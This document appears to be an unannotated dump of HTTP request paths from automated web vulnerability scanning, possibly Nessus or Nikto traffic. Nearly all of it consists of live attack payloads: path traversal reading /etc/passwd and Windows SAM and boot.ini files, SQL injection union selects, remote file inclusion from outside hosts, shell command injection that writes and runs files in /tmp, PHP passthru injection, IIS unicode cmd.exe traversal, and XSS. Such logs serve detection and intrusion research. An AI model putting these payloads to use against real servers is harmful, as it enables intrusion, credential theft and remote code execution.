/examples/jsp/sessions/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /n1afe1y6.php? /en-us/account/base_local_rules.php?dir= /sysuser/docmgr/create.stm?path= /9ko6m4c8.pl? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+f+0+1a00+0+>>ctdn /scripts/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010414','5'-- /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\x00 /o1zj4u9v.do? /examples/jsp/jsp2/el/phptonuke.php?filnavn=/etc/passwd /examples/jsp/checkbox/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1 /gvx7m5ti.cfm? /cacti/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1 /examples/jsp/jsp2/jspx/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\x00 /examples/jsp/cal/index.php?page=/etc/passwd\x00 /main.php?stuff="\x0arm q72652917 # /scripts/ui/login?user=nessus-1331909113 /examples/jsp/jsp2/el/cwmail.exe /i686v90l.php3? /bxnyrhmh.cfm? /en-us/hipkz026.html? /examples/jsp/error/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine= /phpmyadmin/index.php?search= /m4kkjf8l.html? /scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1480204165,1632363387,1,1,1,1,1--&blogid=1 /examples/jsp/jsp2/el/index.php?page=/etc/passwd\x00 /commerce.cgi?page=../../../../../etc/passwd\x00index.html /help.php?q="ver,>q74835818&rem, /en-us/account/zpanel.php?page=/etc/passwd\x00 /javascript/mojo.exe /javascript/groupcp.exe /manager/index.php?site=../../../../../../../../etc/passwd\x00 /pxagj7n7.cfm? /scripts/convert.bas /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+777+/tmp/ltelnhamax.sh'); function v /nuh3zirz.jsp? /ht8pn8uq.nsf? /index.php?cat_select= /en-us/dda2qr7j.cgi? /phpmyadmin/index.php?album=../../../../../../../../../../etc/passwd\x00 /examples/jsp/jsp2/jspx/index.php?configfile=../../../../../../../../../etc/passwd /rpxyx07v.asp? /en-us/account/index.php?gadget=glossary&action=view&term= /help.php?q="del\x09q75241669&rem\x09 /top.php?stuff="\x0adel\x09q64118446\x09# /main.php?stuff="&rm q86234546&rem /rpxyx07v.mscgi? /pxagj7n7.jsp? /u95h6ymu.kspx? /en-us/i686v90l.jsp? /help.php?q="&ver;>q69128354&rem; /examples/jsp/jsp2/jspx/index.php?gadget=../../../../../../etc/passwd\x00&path=/etc /jw64yq8u.htm? /help.php?q=&ver\x0c>q96311231&rem\x0c /transcripts/ /sco0078-1passwd/ /guestbook/?number=5&lng= /main.php?stuff=&ver\xa0>q94142887&rem\xa0 /description.xml /ajax security web application xhr attack surface xss jeremiah grossman article javascript/ /cgi-script/ /script_path/installation/index.php?mosconfig_absolute_path=http://192.168.202.118:8080/tzhfyzkbomspvm?? ftp://192.168.23.202/* /transcript132/ /confirmunsubscription.php?output=@rfiurl /main.php?stuff=';rm\x09q44154782\x09# /javascript/.passwd.pem /kai's_supergoo/ /zmvq66jy.mscgi? /javascript/fixed.exe /examples/jsp/error/cal_make.pl?p0=../../../../../../../../../etc/passwd\x00 /3j8echh0.dll? /phpmyadmin/main.php?g2_itemid=../../../../../license\x00 /scripts/main.php?g2_itemid=../../../../../license\x00 /javascript/paper.exe /javascript/subscriptions.exe /cgi-bin/story/story.pl?next=../../../../../../../../../../etc/passwd\x00 /cgi-bin/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini /h21y8w52.jspa? /script/param/param.inc.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz? /cgi-bin/shoutbox.php?conf=../../../../../../../../etc/passwd /rpxyx07v.aspx? /scripts/tomcat_proxy_directory_traversal.nasl1331904457 /scripts/index.php?act=sm_window&page=event&day=-1 union select 1,1331909396,602648682 -- /help.php?q="\x0asleep\x097\x09# /launch.jsp?nfuse_application=>alert(document.cookie); /hpqtranscript121206/ /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/ikdwpiudzb0;'); function v /javascript/hosts.exe /xsqln7eb.fts? /iktok2bw.do? /en-us/account/index.php?gadget=glossary&action=viewterm&term= /cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904238,927121236 -- /javascript/htpasswd.7z /recordings/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd /nmw0do67.jspa? /7dbjwpw6.cgi? /o1zj4u9v.html? /occam's_razor/ /en-us/7o5qp766.jsp? /egaet53a.exe? /kb.asp?a="> /h5i6crm3.asp? /javascript/ms-sql.exe /0w155a7c.exe? /webcgi/pfdispaly.cgi?'\x0a/bin/cat /etc/passwd|' /fc9t54l7.fts? /cgi-win/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /igtf0zon.kspx? /scripts/forum/database/ezsiteforum.mdb /examples/jsp/jsp2/el/resetpw.php?email=../../../../../../../../../../../../etc/passwd /fcgi-bin/pfdisplay.cgi?'\x0a/bin/cat /etc/passwd|' /help.php?q="|ping,-w,11000,-n,1,1.2.3.4|rem, /w4996nr0.idc? /scriptler/ /moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;/tmp/ukirnkmpbn;" /scripts/modules/printing/output.php?url=li4vli4vli4vli4vli4vli4vli4vli4vli4vzxrjl3bhc3n3za== /shop/member_html.cgi?file=;cat /etc/passwd| /en-us/odzk29aa.asp? /bl8sefdm.html? /weq93ppb.jsp? /l4fz1dqw.jsp? /script-63/ /help.php?q="rm q65533214&rem /qhvu0pdg.dll? /qb2xy9aw.nsf? /phpmyadmin/sql.php?db=openemr&token=87bb516998e94bcddad002864b11a299&table=prescriptions&pos=0 /copatranscript_20061106/ /scripts/nffhikq061nq.cfm /j4rdyhw8.x? /ywaxntrx.pl? /weq93ppb.jspa? /scripts/fgos1sb1c1tr.sh /l4fz1dqw.cfc? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+q+>>esbq /bmeun223.nsf? /u95h6ymu.idc? /vac1l5vm.cfc? /phpmyadmin/netauth.cgi?cmd=show&page=../../../../../../../../../etc/passwd /cacti/index.php?search=&function=search /................../etc/passwd /webcgi/apexec.pl?etype=odp&passurl=/category/&template=../../../../../../../../../../etc/passwd\x00.html /index.php?src=1&_common=1&time=1331904242&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /examples/jsp/num/lang/index.php?file=/etc/passwd /cgi-bin/way-board/way-board.cgi?db=/etc/passwd\x00 /xlj7h65o.cgi? /script/fckeditor/editor/dialog/fck_image.html /scripts/blog.cgi?submit=viewfile&month=01&year=2004&file=|cat /etc/passwd| /top.php?stuff="&del\x09q26831864\x09# /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16 /help.php?q=ver\x0c>q83193297&rem\x0c /l13b77e5.html? /8t9v8k7x.kspx? /examples/jsp/sessionssearch-results.dot?search_query=nessus">/ /spymacxss/ /jnt3f86c.htm? /clk;59162380;7163019;i/ /complete_scripts/ /hrttz9fj.asp? /examples/jsp/colors/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd /javascript/document.tgz /javascript/perl.exe /javascript/document.aspx /9kr0ih0v.aspx? /javascript/.passwd / /miz4r5hz.asp? /o35zot2r.htm? /qhvu0pdg.jspa? /ht8pn8uq.kspx? /examples/jsp/error/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1 /uc3w3bdi.php3? /opensiteadmin/scripts/classes/loginmanager.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\x00 /free_subscriptiontop/ /top.php?stuff='\x0drm q21221735 # /hipscriptdoc/ /javascript/.htpasswd.sfish/4294967296 /cgi-bin/shopper.cgi?newpage=../../../../../../../../../../etc/passwd /javascript/cfide.exe /main.php?stuff=&ver&rem; /dslpwt15.nsf? /examples/jsp/error/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /b5xdqgz2.cfc? /primal script and primal code/ /en-us/h5sc3gxy.do? /bl8sefdm.nsf? /examples/jsp/cal/shoutbox.php?conf=../ /phpmyadmin/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00 /main.php?stuff="ping -w 11000 -n 1 1.2.3.4|rem /en-us/account/login.php?course="> /main.php?stuff="\x0auname\x09>q72429699\x09# /add_comment.php?id="><" /yacs/scripts/update_trailer.php?context[path_to_root]=http://cirt.net/rfiinc.txt?? /help.php?q="&ver,>q25917292&rem, /scripts/admin/plog-admin-functions.php?config[basedir]=/etc/passwd\x00 /scripts/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /lsoix5h3.jsp? /tramadol_prescription/ /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir /scriptpath/footers.php?tinybb_footers=http://192.168.202.96:8080/4dckqcc0acprbz? /scripts/www/delivery/ac.php?bannerid=-1332008596+or+1=1+--+';passthru(base64_decode($_server[http_nessus_gd2bness]));die;/* /8x6w469u.x? /recordings/rss.php?blogid=1&profile=../../config/config.properties.php\x00 /x2gyorli.mscgi? /scripts/index.php?board=nonexistant1519026211 /u8yiqilu.aspx? /_vti_bin/..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc..\xc1%pc../winnt/system32/cmd.exe?/c+dir+c:\+/og /top.php?stuff="ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1&rem\xa0 /cgi-bin/sendpage.pl?message=test\;/bin/ls /etc;echo \message /apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /8x6w469u.idc? /fpnpp5zg.fts? /3j8echh0.jsp? /scripts/login.action /n9xlumt5.php? /floralsubscription/ /javascript/geronimo.exe /passwd2/ /? /en-us/odzk29aa.cfc? //document.writeln(unescape("%3cscript src=%27http://www.example.com/test?rnd=q86275278%27><"+string.fromcharcode(0x2f)+"script>")) /nyjgaorz.cfc? /main.php?logout="del q61955456&rem /cgi-bin/shopplus.cgi?dn=domainname.com&cartid=\xcartid%&file=;cat /etc/passwd| /examples/jsp/error/faxsurvey?cat /etc/passwd /top.php?stuff="uname >q95826835 # /m2fpztty.mscgi? /opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\x00 /vmi8bb12.do? /webcgi/.htpasswd /manager/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd /v3axg1p8.cfm? /examples/servlets/servlet/search.php?submit=true&search='); /0rufe52p.cfc? /bl8sefdm.html? /examples/jsp/colors/quickstore.cgi?page=../../../../../../../../../../etc/passwd\x00html&cart_id= /odzk29aa.pl? /examples/jsp/sessions/shared/help.php?page=../../../../../../../../../../etc/passwd\x00 /en-us/33y9gcqq.do? /scripts/prnnucptkixl.sh /javascript/retail.exe /script/ident/disconnect.php?path_inc=http://192.168.202.118:8080/tzhfyzkbomspvm? /6wb70v0b.jsp? /i686v90l.asp? /bl8sefdm.cfm? /cgi/fileseek2.cgi?foot=&head=;cat /etc/passwd| /javascript/iissamples.exe /um7xpn15.idc? /newsarchive.php?path_to_script=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=ls /search.jsp?q=%" /mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosconfig_absolute_path=@rfiurl /main.php?stuff=ping;-w;10000;-n;1;1.2.3.4|rem; /vhzmaia2.kspx? /phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../etc /cgi-bin/www/delivery/ac.php?bannerid=-1331908694+or+1=1+--+';passthru(base64_decode($_server[http_nessus_nagbw8sx]));die;/* /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/&frm_user=&scr_height=q82549354&scr_width= /help.php?q=';uname\x09>q61196872\x09# /ywaxntrx.fts? /n9xlumt5.asp? /forum.php?do=viewtopic&cat=1&topic=1&page=1? /htbin/msmmask.exe?mask=/junk334 /egaet53a.asp? /javascript/access.exe /examples/jsp/checkbox/htmlscript?../../../../../../../../../etc/passwd /javascript/document.cfm /en-us/account/webplus.exe?script=webplus_install_path.nasl /scripts/wd7crx47eaml.pl /recordings/index.php?cat=' /n1afe1y6.fts? /javascript/effort.exe /javascript/pem.exe /examples/jsp/num/index.php?templates_dir=/etc/passwd\x00 /33y9gcqq.nsf? /cgi-sys/fileseek2.cgi?foot=;cat /etc/passwd&head= //./../../../../../../../.etc/passwd /raanw4ia.x? /search.php?mailbox=inbox&what=x&where=&submit=search /javascript/legal.exe /cgi-bin/fom.cgi?file= /script/index.php?path_inc=http://cirt.net/rfiinc.txt? /javascript/shopper.exe /fcgi-bin/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /if69ddo1.fts? /admin/news.admin.php?path_to_script=http://192.168.202.118:8080/tzhfyzkbomspvm??&cmd=ls /_vti_bin/cgimail.exe /examples/jsp/jsp2/jspx/webdist.cgi?distloc=;id /jdx255ea.do? /scripts/index.php?title=special:version /en-us/9kr0ih0v.asp? /cactifaq.php?skin=../../admin/manager&tplpath=admin /btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd /cgi-win/pfdispaly.cgi?../../../../../../../../../../etc/passwd /scripts/vvh_tajyleqq.pl /scripts/search.jsp?q=%" /igtf0zon.jspa? /javascript/staticpages.exe /static//.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\etc/passwd /javascript/test1.exe /examples/jsp/num/index.php?id=0rop9yeuxw' /examples/jsp/jsp2/el/remindpasswd /pbserver/..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf..\xe0\x80\xaf../winnt/system32/cmd.exe?/c+dir+c:\+/og /ows-bin/sensepost.exe?/c+dir /top.php?stuff="ping -w 8000 -n 1 4.3.2.1&rem /scripts/activeauctionsuperstore/iteminfo.asp?itemid=42' /subscriptions.o /top.php?stuff="&del\xa0q83547895&rem\xa0 /recordings/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd /javascript/htpasswd.properties /main.php?stuff=ver,>q88957187&rem, /examples/jsp/num/cal_week.php?op=week&catview=999' /zqqemp6j.exe? /eg2u8pbv.jsp? /examples/jsp/jsp2/jspx/htgrep/file=index.html&hdr=/etc/passwd /scs86g1p.cgi? /examples/jsp/sessions/athenareg.php?pass= ;id /wholphinsubscriptionbeginningwithno2/ /examples/jsp/jsp2/jspx/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" /g8nu2yy7.php? /main.php?stuff="ping;-w;9000;-n;1;1.2.3.4&rem; /main.inc.php?pathtoscript=http://192.168.202.118:8080/zz5thkvtmlgl? /title_featurescripts/ /.php3 /javascript/document.nsf /scripts/c0kha6w3apd3.asp /javascript/master.exe /vwmg565s.kspx? /help.php?q="|ping -w 7000 -n 1 1.2.3.4|rem /phpmyadmin/index.php?id=0rop9yeuxw' /snippetmaster/includes/vars.inc.php?_session[script_path]=http://192.168.202.118:8080/tzhfyzkbomspvm?? /examples/jsp/cal/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /javascript/albums.exe /msadc/samples/selector/showcode.asp?source=/msadc/samples/../../../../../../../../../winnt/win.ini /scripts/b0j2ijssh6cu.asp /nyvbv05h.aspx? /cgi-bin/misc/audio.php?recording=../version.inc /info.php?id=411905577608&return_=3444444445' /top.php?stuff=";del\x09q35965763\x09# /include/scripts/export_batch.inc.php?dir=http://192.168.202.118:8080/moclyxlwqyfjnp? /9ko6m4c8.idc? /help.php?q="&del\x09q13543643\x09# /scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1331908897.php. /en-us/i686v90l.x? /javascript/k.exe /scripts/wx4z4gedhl0l.inc /main.php?stuff=ver\x0c>q62962642&rem\x0c /6wb70v0b.kspx? /6dlc2zm9.cfm? /javascript/b.exe /examples/jsp/jsp2/el/usrdetails.php?sgnuptype=csaleid /phpmyadmin/kernel/loadkernel.php?installpath=/etc/passwd\x00 /javascript/document.rss /scripts/member.php?action=login /nyvbv05h.php3? /v3axg1p8.php3? /javascript/declaration.exe /7u1pb2xi.x? /cgi-bin/wguest.exe /cacti/squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00 /0w155a7c.jsp? /en-us/i686v90l.jspa? /cgi-bin/phpnews/sendtofriend.php?mid='1' /javascript/nc.exe /examples/jsp/error/search.php?submit=true&search='); /.htm /javascript/iso.exe /i686v90l.x? /scripts/gbadmin.cgi?action=setup /javascript/policies.exe /admin/index.php?path_to_script=http://192.168.202.96:8080/llumt7msyau5y??&cmd=ls /examples/jsp/jsp2/jspx/detail.asp?nchannel='1 /tuwjta1w.asp? /index.php?query=&type=advanced&results=20&searchtype=2 /scriptheader2/ /aoy7kzbh.exe /phpmyadmin/protection.php?action=logout&siteurl=/etc/passwd /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+00+00+00+00+00+40+30+00+00+34+30+00+00+00+00+00+00+00+00+00+00+00+00+00++>>esbq /phptonuke.php?filnavn= /examples/jsp/jsp2/el/more.php?id=1' /modules.php?op=modload&name=faq&file=index&myfaq=yes&id_cat=1&categories=&parent_id=0 /jujgxwav.php3? /katamari damacy soundtrack 'katamari fortissimo damacy'/ /fc9t54l7.jspa? /t578vqea.jsp? /riskmodeldescription/ /o1zj4u9v.mscgi? /iv5vkgam.fts? /main.php?logout='\x0ddel\x09q42114986\x09# /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+4d+5a+50+00+02+00+00+00+04+00+0f+00+ff+ff+00+00+b8+00+00+00+00+00+00+00+40++>>ctdn /examples/jsp/jsp2/el/index.php?id='union/**/select/**/0,0,869732329,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0-- /eg2u8pbv.cgi? /main.php?stuff=;rm\x09q16377967\x09# /phpmyadmin/documentation.html?phpmyadmin=||cat /etc/passwd /javascript/business.exe /rpxyx07v.mscgi? /? /g3w7y7u5.dll? /cgi-local/cgi-test.exe /examples/servlets/servlet/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\x00html /opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.96:8080/ipb5ri?\x00 /forum.asp?n=/../../../../../../etc/passwd|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_'/'. /ydexw8by.jspa? /ezhttpbench.php?analysesite=/etc/passwd&numloops=1 /d44uk9h2.nsf? /help.php?q='&rm q67988136 # /../../../../../../winnt/repair/sam._ /includes/tellafriend.php?about=game&gamename= /9kr0ih0v.asp? /cacti/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\x00 /forgotpasswd/ /scripts/port.php?proto=tcp' /scripts/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1461801666,2,718923871,4,5,6,7,8,9,0,1,2,3 -- /u8yiqilu.fts? /help.php?q='del\x09q87915929\x09# /phpmyadmin/faxsurvey?cat /etc/passwd /scripts/doku.php /x7pclv4s.cfc? /_vti_bin/shtml.exe/_vti_rpc?method=server+version:4.0.2.2611 /examples/jsp/cal/embed/day.php?path=/etc/passwd\x00 /raanw4ia.nsf? /l4fz1dqw.idc? /manuscript/ /examples/servlets/servlet/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00 /ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /bmeun223.dll? /scripts/axdgpyi2bn6f.asp /cgi-local/fileseek2.cgi?foot=;cat /etc/passwd&head= /mpcgi/msmmask.exe?mask=/junk334 /examples/jsp/cal/athenareg.php?pass= ;id /examples/jsp/num/index.php?action=view&filename=../../../../../../../../../../../../../etc/passwd /prescription-carisoprodol/ /javascript/fb.exe /examples/jsp/jsp2/jspx/index.php?cat_select= /javascript/word.exe /en-us/account/kb.cgi?view='&lang=en /pirvate/ltwpdfmonth.php?ltw_config['include_dir]=http://192.168.202.96:8080/4dckqcc0acprbz? /en-us/account/gadgets/blog/blogmodel.php?path=/etc/passwd\x00 /? /? /cacti/item.fts?href=">; /zqqemp6j.jspa? /en-us/account/feedsplitter.php?format=../../../../../../../../../../etc/passwd\x00&debug=1 /boorp's/ /bin/fileseek2.cgi?foot=;cat /etc/passwd&head= /admin.php?style=../../../../../../../../../../../../etc/passwd\x00 /phpmyadmin/base_qry_common.php?base_path=/etc/passwd\x00 /recordings/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\x00.html&passurl=/category/ /m5103snj.mscgi? /d765w06j.jsp? /examples/jsp/sessions/config.php?path[docroot]=/etc/passwd\x00 /fpnpp5zg.nsf? /recordings/_head.php?_zb_path=../../../../../../../../../../etc/passwd\x00 /don't let daddy know/ /pfdispaly?../../../../../../etc/passwd /cgibin/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /scripts/fileseek.cgi?foot=;cat /etc/passwd&head= /b4vng02k.idc? /recordings/tinybrowser/upload.php?badfiles=1> /javascript/loc.exe /odzk29aa.jspa? /examples/jsp/cal/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd /javascript/partners.exe /phpmyadmin/documentation.html?bad_bad_value'=1 /scripts/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332010411 /firewall/policy/dlg?q=-1&fzone=t>&tzone=dmz /17_morecscript/ /scripts/tinfo.php?id=1332008327 /examples/jsp/jsp2/el/bb-hist.sh?histfile=../../../../../etc/passwd /t578vqea.php3? /examples/jsp/cal/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331923205,4--&blog=1 /9o6g5vkn.cfm? /vwmg565s.jspa? /egaet53a.php3? /search.cgi?..\..\..\..\..\..\winnt\win.ini /vac1l5vm.asp? /phpmyadmin/wiki.php/ /manager/ftp/ftp.pl?dir=../../../../../../etc /subscriptions.so /phil collins - don't lose my number by cypher [cvap]/ /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 /main.php?stuff="ping;-w;9000;-n;1;4.3.2.1&rem; /0w155a7c.nsf? /phpmyadmin/documentation.html?phpmyadmin=+adw-script+ad4-alert(202)+adw-/script+ad4- /description-valium/ /help.php?q="ping\x09-w\x097000\x09-n\x091\x094.3.2.1&rem\x09 /examples/jsp/sessions/search.jsp?q=%" /hrttz9fj.cfc? /nuh3zirz.x? /examples/jsp/cal/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00 /fc9t54l7.php3? /.aspx /en-us/jnv890lt.php? /aj3pf49c.cgi? /examples/jsp/checkbox/usrdetails.php?sgnuptype=csaleid /3j8echh0.asp? /82q7ywa8.aspx? /help.php?q="ping\xa0-w\xa010000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /help.php?q='|sleep\x099\x09# /9o6g5vkn.cgi? /javascript/audit.exe /cgi-915/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /viewers/txt.php?filename=../../../../../../../../../../etc/passwd\x00 /scripts/qcvjnagy16kc.cgi /azcrfs8d.jsp? /javascript/dir-prop-base.exe /examples/jsp/num/a1disp3.cgi?/../../../../../../etc/passwd /javascript/prepaid.exe /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /bzuf9ozq.asp? /en-us/esmozg5d.pl? /script/ident/identification.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz? /phpmyadmin/sawmill6cl.exe?ho+{complete_version} /zv8tv7h8.cfm? /top.php?stuff=\x0duname >q54622814 # /scripts/index.php?option=frontpage&itemid=2|system(id)|1331919202 /pxagj7n7.jspa? /saviotranscript/ /ap58k3ci.cfc? /pxagj7n7.x? /components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/ipb5ri??&cmd=id /en-us/account/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00 /en-us/account/protection.php?action=logout&siteurl=/etc/passwd /cgi-exe/gwweb.exe?help=bad-request /examples/jsp/checkbox/admin/top.php?admindir=/etc/passwd\x00 /scripts/n4p4f4gtbhia.inc /javascript/important.exe /recordings/index.php?site=../../../../../../../../etc/passwd\x00 /zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.118:8080/ghl9il?? /subscriptions.conf /9kr0ih0v.cfm? /nyvbv05h.kspx? /dataservice.asmx/authuser?username='nessus1331919210&password=nasl&needcompress=0 /examples/jsp/sessions/index.php?_language=../../../../../../../../../../etc/passwd\x00 /top.php?stuff="&ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /en-us/h5sc3gxy.fts? /demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.96:8080/swgnhpydbq0t?& /scripts/index.php?search='>&searchmode=f /scripts/index.php?edit=nonexistant138490642 /3m5knyc4.pl? /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+5e+30+00+00+00+00+00+00+4b+45+52+4e+45+4c+33+32+2e+64+6c+6c+00+00+00+00+4c++>>esbq /r3le3om5.idc? /javascript/xsl.exe /examples/jsp/colors/anacondaclip.pl?template=../../../../../../../../../../../../../../../etc/passwd /main.php?stuff='rm\x09q85216432\x09# /main.php?stuff="del q22289594 # /cgi-bin/docs/index.php?lang=/../../../../../../../../../../etc/passwd\x00 /phpmyadmin/index.php?p='nessus /cgi-bin/admin.php?style=../../../../../../../../../../../../etc/passwd\x00 /main.php?stuff='\x0adel\x09q47233887\x09# /weq93ppb.html? /modules/forums/bb_smilies.php?name= /7u1pb2xi.asp? /subscriptions_contacts/ /.kspx /top.php?stuff="&sleep\x0910\x09# /iajtej82.jspa? /search_result.asp?category=all&keyword=sql_error411826083446'&mode=date /qb2xy9aw.cfm? /bxnyrhmh.nsf? /top.php?stuff="ping\x09-w\x098000\x09-n\x091\x094.3.2.1&rem\x09 /scripts/qbch5ojumj32.html /egaet53a.php3? /top.php?stuff="ping,-w,9000,-n,1,1.2.3.4&rem, /scripts/lpzj75ztw9lb.php /examples/jsp/cal/pmwiki.php?globals[farmd]=/etc/passwd\x00 /pachelbel's_canon/ /examples/jsp/calsearch-results.dot?search_query=nessus">/ /main.php?stuff="&ping,-w,10000,-n,1,4.3.2.1&rem, /vac1l5vm.idc? /fcgi-bin/ppdscgi.exe /tukodz3j.nsf? /scripts/index.php?mode=administration /subscriptions.bz2 /en-us/i686v90l.htm? /javascript/htpasswd.msg /javascript/star.exe /scripts/nffhikq061nq.html /opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.118:8080/2aibfaczmac8?\x00 /main.php?logout="\x0arm\x09q98198938\x09# /scripts/includes/calendar.php?phpc_root_path=http://xxxx./ /cgi-bin/base_local_rules.php?dir= /8t9v8k7x.asp? /help.php?q="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b /javascript/viewtopic.exe /raanw4ia.jspa? /examples/jsp/colors/survey.inc.php?path=/etc/passwd\x00 /cgi-exe/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /main.php?stuff="\x0drm\x09q25635537\x09# /help.php?q="rm\x09q46669995\x09# /quagynka.cgi? /examples/jsp/jsp2/jspx?username=" /top.php?stuff=';del\x09q65186773\x09# /cgi-bin/file.php?path=/etc/passwd\x00 /cgi-bin/browse_item_details.asp?item_id='webstores_browseitemdetails_sql_injection.nasl /qb2xy9aw.jsp? /bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../../boot.ini\x00 /acart2_0/error.asp?msg= /b5xdqgz2.x? /examples/servlets/servlet/admin/addentry.php?phpbb_root_path=/etc/passwd\x00 /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+20+72+75+6e+20+69+6e+20+44+4f+53+20+6d+6f+64+65+24+00+00+00+00+00+00+00+00++>>ctdn /scripts/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904231,1,1,1,1,1,1,1--&blogid=1 /forum1_professionnel.asp?n=1771&nn=../../../../../../../../../etc/passwd\x00&page=1 /en-us/account/index.php?configfile=../../../../../../../../../etc/passwd /examples/jsp/colors/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd /gepi/gestion/savebackup.php?filename=http://192.168.202.96:8080/4dckqcc0acprbz?&cmd=cat/etc/passwd /base_local_rules.php?dir= /help.php?q=";sleep\x0910\x09# /javascript/www-sql.exe /en-description/ /javascript/document.csv /vjbrrppi.mscgi? /l13b77e5.kspx? /ddoworrl.do? /scripts/cevvxrxqxc_b.sh /awstats/awstats.pl?migrate=|echo;/bin/echo -en "\0174\0044\0000\0377\0347" >> /tmp/ysooqnjtxq0;echo|awstats607059.txt /7dbjwpw6.x? /examples/jsp/error/phpnews/sendtofriend.php?mid='1' /wps/wcm/webinterface/login/login.jsp?"> /dir_thatware/config.php?root_path=@rfiurl' /? /cgi-bin/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00 /phpmyadmin/www/delivery/ac.php?bannerid=-1332008596+or+1=1+--+';passthru(base64_decode($_server[http_nessus_j63eevk_]));die;/* 